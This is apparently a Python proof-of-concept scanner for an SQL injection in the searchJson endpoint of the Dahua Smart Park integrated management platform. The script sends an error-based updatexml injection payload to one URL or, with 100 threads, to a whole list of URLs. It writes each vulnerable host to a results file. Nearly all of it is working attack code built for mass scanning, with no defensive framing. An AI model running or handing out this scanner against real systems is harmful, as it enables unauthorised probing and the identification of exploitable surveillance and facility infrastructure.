#大华智慧园区综合管理平台 searchJson SQL注入漏洞

import requests,sys,argparse,re

from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()


def banner():
    test="""  """
    print(test)

def main():
    banner()
    parsers=argparse.ArgumentParser(description='大华智慧园区综合管理平台 searchJson SQL注入漏洞')
    parsers.add_argument('-u','--url',dest='url',type=str,help='please input your url')
    parsers.add_argument('-f','--file',dest='file',type=str,help='please input your filepath')
    args=parsers.parse_args()

    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        #mp.map(poc, url_list) 的作用是并行地对 url_list 中的每个 URL 执行 poc 函数（或方法）
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"usag:\n\t python {sys.argv[0]} -h")
def poc(target):
    payload='/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20MD5(1)),0x7e),1)--%22%7D/extend/%7B%7D'
    headers={
        'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:128.0)Gecko/20100101Firefox/128.0',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip,deflate',
        'Connection':'close',
        'Upgrade-Insecure-Requests':'1',
        'Priority':'u=0,i',
    }
    proxies={
        'http':'http://127.0.0.1:8080',
        'https':'http://127.0.0.1:8080'
    }
    try:
        res1=requests.get(url=target+payload,headers=headers,verify=False,proxies=proxies)
        if res1.status_code==500:
            match=re.findall(r"~c4ca4238a0b923820dcc509a6f75849",res1.text)
            # print(match[0])
            if '~c4ca4238a0b923820dcc509a6f75849' in match[0]:
                print(f"[+]目标存在： {target}")
                with open('result.txt','a') as f:
                    f.write(target+'\n')
            else:
                print(1)
    except:
        pass
   

if __name__ =='__main__':
    main()
